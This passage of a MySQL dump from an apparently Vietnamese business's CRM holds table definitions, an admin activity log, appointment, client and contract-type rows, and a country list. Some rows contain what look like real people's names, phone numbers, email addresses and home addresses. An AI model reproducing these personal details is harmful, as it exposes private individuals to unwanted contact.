(12829, 'Client Deleted [ID: 761]', '2024-06-12 17:08:11', 'Admin WIT'),
(12831, 'Client Deleted [ID: 760]', '2024-06-12 17:08:11', 'Admin WIT'),
(12832, 'Client Deleted [ID: 759]', '2024-06-12 17:08:11', 'Admin WIT'),
(12833, 'Client Deleted [ID: 758]', '2024-06-12 17:08:11', 'Admin WIT'),
(12837, 'Client Deleted [ID: 755]', '2024-06-12 17:08:12', 'Admin WIT'),
(12843, 'Client Deleted [ID: 754]', '2024-06-12 17:08:12', 'Admin WIT'),
(12844, 'Client Deleted [ID: 753]', '2024-06-12 17:08:12', 'Admin WIT'),
(12846, 'Client Deleted [ID: 752]', '2024-06-12 17:08:12', 'Admin WIT'),
(12847, 'Client Deleted [ID: 749]', '2024-06-12 17:08:12', 'Admin WIT'),
(12848, 'Client Deleted [ID: 748]', '2024-06-12 17:08:12', 'Admin WIT'),
(12849, 'Client Deleted [ID: 2]', '2024-06-12 17:08:12', 'Admin WIT'),
(12850, 'Client Deleted [ID: 1]', '2024-06-12 17:08:12', 'Admin WIT'),
(12851, 'Customer Info Updated [ID: 1449]', '2024-06-12 17:08:49', 'Admin WIT'),
(12852, 'Customer Info Updated [ID: 1449]', '2024-06-12 17:09:09', 'Admin WIT'),
(12853, 'Credit Note Updated [ID:10]', '2024-06-12 17:14:53', 'Admin WIT'),
(12854, 'Article Deleted [ArticleID: 4]', '2024-06-12 17:20:07', 'Admin WIT'),
(12855, 'Article Deleted [ArticleID: 3]', '2024-06-12 17:20:11', 'Admin WIT'),
(12856, 'Article Deleted [ArticleID: 1]', '2024-06-12 17:20:14', 'Admin WIT'),
(12857, 'Ticket Deleted [ID: 83]', '2024-06-12 17:24:47', 'Admin WIT'),
(12858, 'Ticket Deleted [ID: 87]', '2024-06-12 17:24:51', 'Admin WIT'),
(12859, 'Ticket Deleted [ID: 79]', '2024-06-12 17:24:55', 'Admin WIT'),
(12860, 'Ticket Deleted [ID: 80]', '2024-06-12 17:24:59', 'Admin WIT'),
(12861, 'Ticket Deleted [ID: 78]', '2024-06-12 17:25:04', 'Admin WIT'),
(12862, 'Ticket Deleted [ID: 77]', '2024-06-12 17:25:08', 'Admin WIT'),
(12863, 'Ticket Deleted [ID: 85]', '2024-06-12 17:26:28', 'Admin WIT'),
(12864, 'Predefined Reply Updated [ID: 1, Đã tiếp nhận yêu cầu - Hồ sơ học viên mới]', '2024-06-12 21:34:15', 'Admin WIT'),
(12865, 'Announcement Updated [THÔNG BÁO VỀ THÔNG TIN ĐĂNG KÝ HỌC VIÊN]', '2024-06-12 21:40:05', 'Admin WIT');

-- --------------------------------------------------------

--
-- Table structure for table `tblallowance_type`
--

CREATE TABLE `tblallowance_type` (
  `type_id` int(10) UNSIGNED NOT NULL,
  `type_name` varchar(200) NOT NULL,
  `allowance_val` decimal(15,2) NOT NULL,
  `taxable` tinyint(1) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblallowance_type`
--

INSERT INTO `tblallowance_type` (`type_id`, `type_name`, `allowance_val`, `taxable`) VALUES
(2, 'Xăng xe + Điện thoại', 0.00, 0),
(3, 'Chi phí công tác', 0.00, 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblannouncements`
--

CREATE TABLE `tblannouncements` (
  `announcementid` int(11) NOT NULL,
  `name` varchar(191) NOT NULL,
  `message` text DEFAULT NULL,
  `showtousers` int(11) NOT NULL,
  `showtostaff` int(11) NOT NULL,
  `showname` int(11) NOT NULL,
  `dateadded` datetime NOT NULL,
  `userid` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblannouncements`
--

INSERT INTO `tblannouncements` (`announcementid`, `name`, `message`, `showtousers`, `showtostaff`, `showname`, `dateadded`, `userid`) VALUES
(1, 'THÔNG BÁO VỀ THÔNG TIN ĐĂNG KÝ HỌC VIÊN', '<p>K&#7875; t&#7915; ng&#224;y 1.3.2022 c&#225;c h&#7891; s&#417; &#273;&#259;ng k&#253; h&#7885;c vi&#234;n &#273;&#7873;u &#273;&#432;&#7907;c l&#432;u tr&#7919; &#273;&#7847;y &#273;&#7911; th&#244;ng qua website qu&#7843;n l&#253;.<br><br><br>Tr&#226;n tr&#7885;ng th&#244;ng tin &#273;&#7871;n to&#224;n th&#7875; qu&#253; kh&#225;ch h&#224;ng.<br>WIT</p>', 0, 1, 0, '2022-03-09 18:39:55', 'Ho Gia Phat');

-- --------------------------------------------------------

--
-- Table structure for table `tblapplicable_staff`
--

CREATE TABLE `tblapplicable_staff` (
  `id` int(11) NOT NULL,
  `commission_policy` int(11) NOT NULL,
  `applicable_staff` longtext NOT NULL,
  `name` varchar(255) NOT NULL,
  `datecreated` datetime NOT NULL,
  `addedfrom` int(11) NOT NULL,
  `is_client` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblappointly_appointments`
--

CREATE TABLE `tblappointly_appointments` (
  `id` int(10) UNSIGNED NOT NULL,
  `google_event_id` varchar(191) DEFAULT NULL,
  `google_calendar_link` varchar(191) DEFAULT NULL,
  `google_meet_link` varchar(191) DEFAULT NULL,
  `google_added_by_id` int(11) DEFAULT NULL,
  `outlook_event_id` varchar(191) DEFAULT NULL,
  `outlook_calendar_link` varchar(255) DEFAULT NULL,
  `outlook_added_by_id` int(11) DEFAULT NULL,
  `subject` varchar(191) NOT NULL,
  `description` text DEFAULT NULL,
  `email` varchar(191) DEFAULT NULL,
  `name` varchar(191) DEFAULT NULL,
  `phone` varchar(191) DEFAULT NULL,
  `address` varchar(191) DEFAULT NULL,
  `notes` longtext DEFAULT NULL,
  `contact_id` int(11) DEFAULT NULL,
  `by_sms` tinyint(1) DEFAULT NULL,
  `by_email` tinyint(1) DEFAULT NULL,
  `hash` varchar(191) DEFAULT NULL,
  `notification_date` datetime DEFAULT NULL,
  `external_notification_date` datetime DEFAULT NULL,
  `date` date NOT NULL,
  `start_hour` varchar(191) NOT NULL,
  `approved` tinyint(1) NOT NULL DEFAULT 0,
  `created_by` int(11) DEFAULT NULL,
  `reminder_before` int(11) DEFAULT NULL,
  `reminder_before_type` varchar(10) DEFAULT NULL,
  `finished` tinyint(1) NOT NULL DEFAULT 0,
  `cancelled` tinyint(1) NOT NULL DEFAULT 0,
  `cancel_notes` text DEFAULT NULL,
  `source` varchar(191) DEFAULT NULL,
  `type_id` int(11) NOT NULL DEFAULT 0,
  `feedback` smallint(6) DEFAULT NULL,
  `feedback_comment` text DEFAULT NULL,
  `recurring` int(11) NOT NULL DEFAULT 0,
  `recurring_type` varchar(10) DEFAULT NULL,
  `repeat_every` int(11) DEFAULT NULL,
  `custom_recurring` tinyint(4) NOT NULL,
  `cycles` int(11) NOT NULL DEFAULT 0,
  `total_cycles` int(11) NOT NULL DEFAULT 0,
  `last_recurring_date` date DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblappointly_appointments`
--

INSERT INTO `tblappointly_appointments` (`id`, `google_event_id`, `google_calendar_link`, `google_meet_link`, `google_added_by_id`, `outlook_event_id`, `outlook_calendar_link`, `outlook_added_by_id`, `subject`, `description`, `email`, `name`, `phone`, `address`, `notes`, `contact_id`, `by_sms`, `by_email`, `hash`, `notification_date`, `external_notification_date`, `date`, `start_hour`, `approved`, `created_by`, `reminder_before`, `reminder_before_type`, `finished`, `cancelled`, `cancel_notes`, `source`, `type_id`, `feedback`, `feedback_comment`, `recurring`, `recurring_type`, `repeat_every`, `custom_recurring`, `cycles`, `total_cycles`, `last_recurring_date`) VALUES
(2, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Thanh', 'công', 'congho@hogiaphat.vn', 'HÔ', '0909899367', '', NULL, NULL, NULL, NULL, '44cb4e4afc4d36389f1ee003e2616c0f', NULL, NULL, '2023-10-26', '13:00', 1, NULL, NULL, NULL, 1, 0, NULL, 'external', 0, NULL, NULL, 0, NULL, NULL, 0, 0, 0, NULL),
(3, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Thanh', 'Thanh', 'congho@hogiaphat.vn', 'Thanh', '0909899367', '', NULL, NULL, NULL, NULL, 'ffcd0d905c96e8ca31dd1dae20db4160', NULL, NULL, '2023-10-26', '10:00', 1, NULL, NULL, NULL, 0, 0, NULL, 'external', 0, NULL, NULL, 0, NULL, NULL, 0, 0, 0, NULL),
(4, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Hoàng Chí', 'V', 'hogiaphatco@gmail.com', 'Hồ Hoàng', '09090899367', '', NULL, NULL, NULL, NULL, 'ae8c738a9851f6b6640e4405b31bf981', NULL, NULL, '2023-11-01', '11:30', 1, NULL, NULL, NULL, 0, 0, NULL, 'external', 0, NULL, NULL, 0, NULL, NULL, 0, 0, 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblappointly_appointment_types`
--

CREATE TABLE `tblappointly_appointment_types` (
  `id` int(11) NOT NULL,
  `type` varchar(191) NOT NULL,
  `color` varchar(191) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblappointly_attendees`
--

CREATE TABLE `tblappointly_attendees` (
  `staff_id` int(11) NOT NULL,
  `appointment_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblappointly_attendees`
--

INSERT INTO `tblappointly_attendees` (`staff_id`, `appointment_id`) VALUES
(2, 2),
(2, 3),
(2, 4);

-- --------------------------------------------------------

--
-- Table structure for table `tblappointly_callbacks`
--

CREATE TABLE `tblappointly_callbacks` (
  `id` int(11) NOT NULL,
  `call_type` varchar(191) NOT NULL,
  `phone_number` varchar(191) NOT NULL,
  `timezone` varchar(191) NOT NULL,
  `firstname` varchar(191) NOT NULL,
  `lastname` varchar(191) NOT NULL,
  `status` varchar(191) NOT NULL DEFAULT '1',
  `message` text NOT NULL,
  `email` varchar(191) NOT NULL,
  `date_start` datetime NOT NULL,
  `date_end` datetime NOT NULL,
  `date_added` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblappointly_callbacks_assignees`
--

CREATE TABLE `tblappointly_callbacks_assignees` (
  `id` int(11) NOT NULL,
  `callbackid` int(11) NOT NULL,
  `user_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblappointly_google`
--

CREATE TABLE `tblappointly_google` (
  `id` int(11) NOT NULL,
  `staff_id` int(11) NOT NULL,
  `access_token` varchar(191) NOT NULL,
  `refresh_token` varchar(191) NOT NULL,
  `expires_in` varchar(191) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcart`
--

CREATE TABLE `tblcart` (
  `id` int(10) UNSIGNED NOT NULL,
  `id_contact` int(11) NOT NULL,
  `name` varchar(120) NOT NULL,
  `address` varchar(250) NOT NULL,
  `phone_number` varchar(20) NOT NULL,
  `voucher` varchar(100) NOT NULL,
  `status` int(11) DEFAULT 0,
  `complete` int(11) DEFAULT 0,
  `datecreator` datetime NOT NULL DEFAULT current_timestamp(),
  `order_number` varchar(100) DEFAULT NULL,
  `channel_id` int(11) DEFAULT NULL,
  `channel` varchar(150) DEFAULT NULL,
  `first_name` varchar(60) DEFAULT NULL,
  `last_name` varchar(60) DEFAULT NULL,
  `email` varchar(150) DEFAULT NULL,
  `company` varchar(150) DEFAULT NULL,
  `phonenumber` varchar(15) DEFAULT NULL,
  `city` varchar(50) DEFAULT NULL,
  `state` varchar(50) DEFAULT NULL,
  `country` varchar(50) DEFAULT NULL,
  `zip` varchar(50) DEFAULT NULL,
  `billing_street` varchar(150) DEFAULT NULL,
  `billing_city` varchar(50) DEFAULT NULL,
  `billing_state` varchar(50) DEFAULT NULL,
  `billing_country` varchar(50) DEFAULT NULL,
  `billing_zip` varchar(50) DEFAULT NULL,
  `shipping_street` varchar(150) DEFAULT NULL,
  `shipping_city` varchar(50) DEFAULT NULL,
  `shipping_state` varchar(50) DEFAULT NULL,
  `shipping_country` varchar(50) DEFAULT NULL,
  `shipping_zip` varchar(50) DEFAULT NULL,
  `userid` int(11) DEFAULT NULL,
  `notes` text DEFAULT NULL,
  `reason` varchar(250) DEFAULT NULL,
  `admin_action` int(11) DEFAULT 0,
  `discount` varchar(250) DEFAULT NULL,
  `discount_type` int(11) DEFAULT 0,
  `total` varchar(250) DEFAULT NULL,
  `sub_total` varchar(250) DEFAULT NULL,
  `discount_total` varchar(250) NOT NULL DEFAULT '',
  `invoice` varchar(250) NOT NULL DEFAULT '',
  `number_invoice` varchar(250) NOT NULL DEFAULT '',
  `stock_export_number` varchar(250) NOT NULL DEFAULT '',
  `create_invoice` varchar(5) NOT NULL DEFAULT 'off',
  `stock_export` varchar(5) NOT NULL DEFAULT 'off',
  `customers_pay` decimal(15,2) NOT NULL DEFAULT 0.00,
  `amount_returned` decimal(15,2) NOT NULL DEFAULT 0.00,
  `tax` decimal(15,2) NOT NULL DEFAULT 0.00,
  `seller` int(11) DEFAULT NULL,
  `staff_note` text DEFAULT NULL,
  `payment_note` text DEFAULT NULL,
  `allowed_payment_modes` varchar(200) DEFAULT NULL,
  `warehouse_id` int(11) DEFAULT NULL,
  `shipping` decimal(15,2) NOT NULL DEFAULT 0.00,
  `payment_method_title` varchar(250) DEFAULT NULL,
  `discount_type_str` text DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT NULL,
  `adjustment` decimal(15,2) DEFAULT NULL,
  `currency` int(11) DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `shipping_tax` decimal(15,2) DEFAULT NULL,
  `enable` int(11) NOT NULL DEFAULT 1,
  `duedate` date DEFAULT NULL,
  `shipping_tax_json` varchar(150) DEFAULT NULL,
  `discount_voucher` varchar(150) DEFAULT NULL,
  `original_order_id` int(11) DEFAULT NULL,
  `return_reason` longtext DEFAULT NULL,
  `approve_status` int(11) NOT NULL DEFAULT 0,
  `process_invoice` varchar(5) NOT NULL DEFAULT 'off',
  `stock_import_number` int(11) NOT NULL DEFAULT 0,
  `fee_for_return_order` decimal(15,2) DEFAULT NULL,
  `hash` varchar(32) DEFAULT NULL,
  `estimate_id` int(11) DEFAULT NULL,
  `add_discount` decimal(15,2) DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcart_detailt`
--

CREATE TABLE `tblcart_detailt` (
  `id` int(10) UNSIGNED NOT NULL,
  `product_id` int(11) NOT NULL,
  `quantity` float NOT NULL,
  `classify` varchar(30) DEFAULT NULL,
  `cart_id` int(11) NOT NULL,
  `product_name` varchar(150) DEFAULT NULL,
  `prices` decimal(15,2) DEFAULT NULL,
  `long_description` text DEFAULT NULL,
  `sku` text NOT NULL,
  `percent_discount` decimal(15,0) NOT NULL,
  `prices_discount` decimal(15,2) NOT NULL,
  `tax` text DEFAULT NULL,
  `tax_id` text DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `unit_id` int(11) DEFAULT NULL,
  `unit_name` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblclients`
--

CREATE TABLE `tblclients` (
  `userid` int(11) NOT NULL,
  `company` varchar(191) DEFAULT NULL,
  `vat` varchar(50) DEFAULT NULL,
  `phonenumber` varchar(30) DEFAULT NULL,
  `country` int(11) NOT NULL DEFAULT 0,
  `city` varchar(100) DEFAULT NULL,
  `zip` varchar(15) DEFAULT NULL,
  `state` varchar(50) DEFAULT NULL,
  `address` varchar(191) DEFAULT NULL,
  `website` varchar(150) DEFAULT NULL,
  `datecreated` datetime NOT NULL,
  `active` int(11) NOT NULL DEFAULT 1,
  `leadid` int(11) DEFAULT NULL,
  `billing_street` varchar(200) DEFAULT NULL,
  `billing_city` varchar(100) DEFAULT NULL,
  `billing_state` varchar(100) DEFAULT NULL,
  `billing_zip` varchar(100) DEFAULT NULL,
  `billing_country` int(11) DEFAULT 0,
  `shipping_street` varchar(200) DEFAULT NULL,
  `shipping_city` varchar(100) DEFAULT NULL,
  `shipping_state` varchar(100) DEFAULT NULL,
  `shipping_zip` varchar(100) DEFAULT NULL,
  `shipping_country` int(11) DEFAULT 0,
  `longitude` varchar(191) DEFAULT NULL,
  `latitude` varchar(191) DEFAULT NULL,
  `default_language` varchar(40) DEFAULT NULL,
  `default_currency` int(11) NOT NULL DEFAULT 0,
  `show_primary_contact` int(11) NOT NULL DEFAULT 0,
  `stripe_id` varchar(40) DEFAULT NULL,
  `registration_confirmed` int(11) NOT NULL DEFAULT 1,
  `addedfrom` int(11) NOT NULL DEFAULT 0,
  `woo_customer_id` int(11) DEFAULT 0,
  `woo_channel_id` int(11) DEFAULT 0,
  `loy_point` decimal(10,0) DEFAULT 0,
  `client_type` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblclients`
--

INSERT INTO `tblclients` (`userid`, `company`, `vat`, `phonenumber`, `country`, `city`, `zip`, `state`, `address`, `website`, `datecreated`, `active`, `leadid`, `billing_street`, `billing_city`, `billing_state`, `billing_zip`, `billing_country`, `shipping_street`, `shipping_city`, `shipping_state`, `shipping_zip`, `shipping_country`, `longitude`, `latitude`, `default_language`, `default_currency`, `show_primary_contact`, `stripe_id`, `registration_confirmed`, `addedfrom`, `woo_customer_id`, `woo_channel_id`, `loy_point`, `client_type`) VALUES
(756, 'Anh Khánh Onix - 0903676464', NULL, '0903676464', 243, '', '', '', 'C2.05-chung cư RiverPark Premier, H24, Phường Tân Phong, Quận 7', '', '2022-01-17 09:47:51', 1, NULL, 'C2.05-chung cư RiverPark Premier, H24, Phường Tân Phong, Quận 7', '', '', '', 0, 'C2.05-chung cư RiverPark Premier, H24, Phường Tân Phong, Quận 7', '', '', '', 0, NULL, NULL, '', 0, 0, NULL, 1, 3, 0, 0, 0, NULL),
(1449, 'Võ Thiên Thành', NULL, '0905827707', 243, '', '', '', 'Đường số 23, Hiệp Bình Chánh, Tp. Thủ Đức, Tp.HCM', '', '2024-03-07 09:06:55', 1, NULL, '', '', '', '', 0, '', '', '', '', 0, NULL, NULL, '', 0, 0, NULL, 1, 17, 0, 0, 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblcommission`
--

CREATE TABLE `tblcommission` (
  `id` int(11) NOT NULL,
  `staffid` int(11) NOT NULL,
  `invoice_id` int(11) NOT NULL,
  `amount` decimal(15,2) NOT NULL,
  `date` date NOT NULL,
  `is_client` int(11) NOT NULL DEFAULT 0,
  `paid` int(11) NOT NULL DEFAULT 0,
  `amount_paid` decimal(15,2) NOT NULL DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcommission_hierarchy`
--

CREATE TABLE `tblcommission_hierarchy` (
  `id` int(11) NOT NULL,
  `salesman` int(11) NOT NULL,
  `coordinator` int(11) NOT NULL,
  `percent` varchar(45) NOT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `datecreated` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcommission_policy`
--

CREATE TABLE `tblcommission_policy` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `from_date` date NOT NULL,
  `to_date` date DEFAULT NULL,
  `percent_enjoyed` varchar(45) DEFAULT NULL,
  `product_setting` longtext DEFAULT NULL,
  `ladder_setting` longtext DEFAULT NULL,
  `datecreated` datetime NOT NULL,
  `commission_policy_type` varchar(45) DEFAULT NULL,
  `addedfrom` int(11) NOT NULL,
  `clients` text DEFAULT NULL,
  `client_groups` text DEFAULT NULL,
  `commmission_first_invoices` int(11) NOT NULL DEFAULT 0,
  `number_first_invoices` int(11) NOT NULL DEFAULT 0,
  `percent_first_invoices` varchar(45) NOT NULL DEFAULT '0',
  `ladder_product_setting` longtext DEFAULT NULL,
  `amount_to_calculate` varchar(45) NOT NULL DEFAULT '0',
  `commission_type` varchar(45) NOT NULL DEFAULT 'percentage'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcommission_receipt`
--

CREATE TABLE `tblcommission_receipt` (
  `id` int(11) NOT NULL,
  `amount` decimal(15,2) NOT NULL,
  `paymentmode` varchar(40) DEFAULT NULL,
  `paymentmethod` varchar(191) DEFAULT NULL,
  `date` date NOT NULL,
  `daterecorded` datetime NOT NULL,
  `note` text NOT NULL,
  `transactionid` mediumtext DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `convert_expense` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcommission_receipt_detail`
--

CREATE TABLE `tblcommission_receipt_detail` (
  `id` int(11) NOT NULL,
  `receipt_id` int(11) NOT NULL,
  `commission_id` int(11) NOT NULL,
  `amount_paid` decimal(15,2) NOT NULL DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcommission_salesadmin_group`
--

CREATE TABLE `tblcommission_salesadmin_group` (
  `id` int(11) NOT NULL,
  `salesadmin` int(11) NOT NULL,
  `customer_group` int(11) NOT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `datecreated` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblconsents`
--

CREATE TABLE `tblconsents` (
  `id` int(11) NOT NULL,
  `action` varchar(10) NOT NULL,
  `date` datetime NOT NULL,
  `ip` varchar(40) NOT NULL,
  `contact_id` int(11) NOT NULL DEFAULT 0,
  `lead_id` int(11) NOT NULL DEFAULT 0,
  `description` text DEFAULT NULL,
  `opt_in_purpose_description` text DEFAULT NULL,
  `purpose_id` int(11) NOT NULL,
  `staff_name` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblconsent_purposes`
--

CREATE TABLE `tblconsent_purposes` (
  `id` int(11) NOT NULL,
  `name` varchar(100) NOT NULL,
  `description` text DEFAULT NULL,
  `date_created` datetime NOT NULL,
  `last_updated` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcontacts`
--

CREATE TABLE `tblcontacts` (
  `id` int(11) NOT NULL,
  `userid` int(11) NOT NULL,
  `is_primary` int(11) NOT NULL DEFAULT 1,
  `firstname` varchar(191) NOT NULL,
  `lastname` varchar(191) NOT NULL,
  `email` varchar(100) NOT NULL,
  `phonenumber` varchar(100) NOT NULL,
  `title` varchar(100) DEFAULT NULL,
  `datecreated` datetime NOT NULL,
  `password` varchar(255) DEFAULT NULL,
  `new_pass_key` varchar(32) DEFAULT NULL,
  `new_pass_key_requested` datetime DEFAULT NULL,
  `email_verified_at` datetime DEFAULT NULL,
  `email_verification_key` varchar(32) DEFAULT NULL,
  `email_verification_sent_at` datetime DEFAULT NULL,
  `last_ip` varchar(40) DEFAULT NULL,
  `last_login` datetime DEFAULT NULL,
  `last_password_change` datetime DEFAULT NULL,
  `active` tinyint(1) NOT NULL DEFAULT 1,
  `profile_image` varchar(191) DEFAULT NULL,
  `direction` varchar(3) DEFAULT NULL,
  `invoice_emails` tinyint(1) NOT NULL DEFAULT 1,
  `estimate_emails` tinyint(1) NOT NULL DEFAULT 1,
  `credit_note_emails` tinyint(1) NOT NULL DEFAULT 1,
  `contract_emails` tinyint(1) NOT NULL DEFAULT 1,
  `task_emails` tinyint(1) NOT NULL DEFAULT 1,
  `project_emails` tinyint(1) NOT NULL DEFAULT 1,
  `ticket_emails` tinyint(1) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcontact_permissions`
--

CREATE TABLE `tblcontact_permissions` (
  `id` int(11) NOT NULL,
  `permission_id` int(11) NOT NULL,
  `userid` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcontracts`
--

CREATE TABLE `tblcontracts` (
  `id` int(11) NOT NULL,
  `content` longtext DEFAULT NULL,
  `description` text DEFAULT NULL,
  `subject` varchar(191) DEFAULT NULL,
  `client` int(11) NOT NULL,
  `datestart` date DEFAULT NULL,
  `dateend` date DEFAULT NULL,
  `contract_type` int(11) DEFAULT NULL,
  `project_id` int(11) DEFAULT NULL,
  `addedfrom` int(11) NOT NULL,
  `dateadded` datetime NOT NULL,
  `isexpirynotified` int(11) NOT NULL DEFAULT 0,
  `contract_value` decimal(15,2) DEFAULT NULL,
  `trash` tinyint(1) DEFAULT 0,
  `not_visible_to_client` tinyint(1) NOT NULL DEFAULT 0,
  `hash` varchar(32) DEFAULT NULL,
  `signed` tinyint(1) NOT NULL DEFAULT 0,
  `signature` varchar(40) DEFAULT NULL,
  `marked_as_signed` tinyint(1) NOT NULL DEFAULT 0,
  `acceptance_firstname` varchar(50) DEFAULT NULL,
  `acceptance_lastname` varchar(50) DEFAULT NULL,
  `acceptance_email` varchar(100) DEFAULT NULL,
  `acceptance_date` datetime DEFAULT NULL,
  `acceptance_ip` varchar(40) DEFAULT NULL,
  `short_link` varchar(100) DEFAULT NULL,
  `last_sent_at` datetime DEFAULT NULL,
  `contacts_sent_to` text DEFAULT NULL,
  `last_sign_reminder_at` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcontracts_types`
--

CREATE TABLE `tblcontracts_types` (
  `id` int(11) NOT NULL,
  `name` mediumtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcontracts_types`
--

INSERT INTO `tblcontracts_types` (`id`, `name`) VALUES
(1, 'Hợp đồng mua bán'),
(2, 'Hợp đồng thành viên mới'),
(3, 'Hợp đồng dịch vụ');

-- --------------------------------------------------------

--
-- Table structure for table `tblcontract_comments`
--

CREATE TABLE `tblcontract_comments` (
  `id` int(11) NOT NULL,
  `content` mediumtext DEFAULT NULL,
  `contract_id` int(11) NOT NULL,
  `staffid` int(11) NOT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcontract_renewals`
--

CREATE TABLE `tblcontract_renewals` (
  `id` int(11) NOT NULL,
  `contractid` int(11) NOT NULL,
  `old_start_date` date NOT NULL,
  `new_start_date` date NOT NULL,
  `old_end_date` date DEFAULT NULL,
  `new_end_date` date DEFAULT NULL,
  `old_value` decimal(15,2) DEFAULT NULL,
  `new_value` decimal(15,2) DEFAULT NULL,
  `date_renewed` datetime NOT NULL,
  `renewed_by` varchar(100) NOT NULL,
  `renewed_by_staff_id` int(11) NOT NULL DEFAULT 0,
  `is_on_old_expiry_notified` int(11) DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblcountries`
--

CREATE TABLE `tblcountries` (
  `country_id` int(11) NOT NULL,
  `iso2` char(2) DEFAULT NULL,
  `short_name` varchar(80) NOT NULL DEFAULT '',
  `long_name` varchar(80) NOT NULL DEFAULT '',
  `iso3` char(3) DEFAULT NULL,
  `numcode` varchar(6) DEFAULT NULL,
  `un_member` varchar(12) DEFAULT NULL,
  `calling_code` varchar(8) DEFAULT NULL,
  `cctld` varchar(5) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcountries`
--

INSERT INTO `tblcountries` (`country_id`, `iso2`, `short_name`, `long_name`, `iso3`, `numcode`, `un_member`, `calling_code`, `cctld`) VALUES
(1, 'AF', 'Afghanistan', 'Islamic Republic of Afghanistan', 'AFG', '004', 'yes', '93', '.af'),
(2, 'AX', 'Aland Islands', '&Aring;land Islands', 'ALA', '248', 'no', '358', '.ax'),
(3, 'AL', 'Albania', 'Republic of Albania', 'ALB', '008', 'yes', '355', '.al'),
(4, 'DZ', 'Algeria', 'People\'s Democratic Republic of Algeria', 'DZA', '012', 'yes', '213', '.dz'),
(5, 'AS', 'American Samoa', 'American Samoa', 'ASM', '016', 'no', '1+684', '.as'),
(6, 'AD', 'Andorra', 'Principality of Andorra', 'AND', '020', 'yes', '376', '.ad'),
(7, 'AO', 'Angola', 'Republic of Angola', 'AGO', '024', 'yes', '244', '.ao'),
